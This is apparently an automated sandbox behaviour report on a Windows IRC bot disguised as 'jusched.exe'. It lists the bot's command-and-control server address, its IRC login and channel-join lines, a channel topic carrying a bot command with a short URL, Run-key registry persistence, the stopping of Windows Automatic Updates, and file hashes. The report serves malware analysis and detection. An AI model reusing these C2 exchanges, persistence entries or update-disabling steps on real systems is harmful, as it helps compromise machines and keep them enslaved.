Remote Host Port Number
66.225.241.182 2345
PASS xxx
NICK NEW-[USA|00|P|78655]
USER XP-9188 * 0 :COMPUTERNAME
MODE NEW-[USA|00|P|78655] -ix
JOIN #!gf! test
PONG 22 MOTD
Now talking in #!gf!
Topic On: [ #!gf! ] [ .m.s|.m.e Foto 😀 http://to.ly/7Blo?= ]
Topic By: [ wd89 ]
* The data identified by the following URLs was then requested from the remote web server:
Other details
* The following port was open in the system:
Port Protocol Process
1058 TCP jusched.exe (%Windir%\jusched.exe)
Registry Modifications
* The newly created Registry Values are:
o [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
+ Java developer Script Browse = "%Windir%\jusched.exe"
so that jusched.exe runs every time Windows starts
o [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\Run]
+ Java developer Script Browse = "%Windir%\jusched.exe"
so that jusched.exe runs every time Windows starts
o [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
+ Java developer Script Browse = "%Windir%\jusched.exe"
so that jusched.exe runs every time Windows starts
Memory Modifications
* There was a new process created in the system:
Process Name Process Filename Main Module Size
jusched.exe %Windir%\jusched.exe 3 141 632 bytes
* The following system service was modified:
Service Name Display Name New Status Service Filename
wuauserv Automatic Updates "Stopped" %System%\svchost.exe -k netsvcs
File System Modifications
* The following file was created in the system:
# Filename(s) File Size File Hash
1 %Windir%\jusched.exe
[file and pathname of the sample #1] 200 704 bytes MD5: 0xD3D5D37E3ED8A3553FC846F90BEE7919
SHA-1: 0x2C26E621C21E992BC151906A3088FA1A335357CE